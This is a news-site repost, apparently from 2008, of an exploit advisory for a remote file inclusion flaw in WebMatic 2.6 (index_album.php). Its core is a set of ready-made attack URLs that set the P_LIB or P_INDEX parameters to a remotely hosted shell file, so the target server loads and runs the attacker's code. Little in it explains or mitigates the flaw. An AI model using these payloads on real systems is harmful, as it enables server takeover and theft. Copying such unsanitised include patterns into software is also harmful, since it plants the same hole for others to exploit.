11.21.2008
Navigation:
Main Page
Technology
Downloads
Security
Entertainment
Videos
Search Site:
Advanced
Login
Register
News Item
WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
Feb 07 2007 19:55:19
Source:
ace
0
-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6
#Author : MadNet
#Contact : MadNet[at]Hackertr[Dot]org
#S.Page : www.valarsoft.com :)
--------------------------------------*******************-----------------------------------------------------------
Error1 : require($P_LIB."lib_album.php");
Error2 : require($P_INDEX."page_album.inc");
[[RFI]]
http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]
http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]
-------------------------------------------------
Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt
Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
-- MadNet From Turkey & Cyber-Sabotger Orgeneral --
» full story @ source-link:
ace
Related Articles:
»
Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
»
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
»
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
»
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
Comments
Add Comment
You must be registered and logged in to add comments!
Register
Login
Sponsors
Sponsors
Addict
3
d.org (c) 2002 - 2008 -
About US
-
Contact US
site was created by smiles of fortune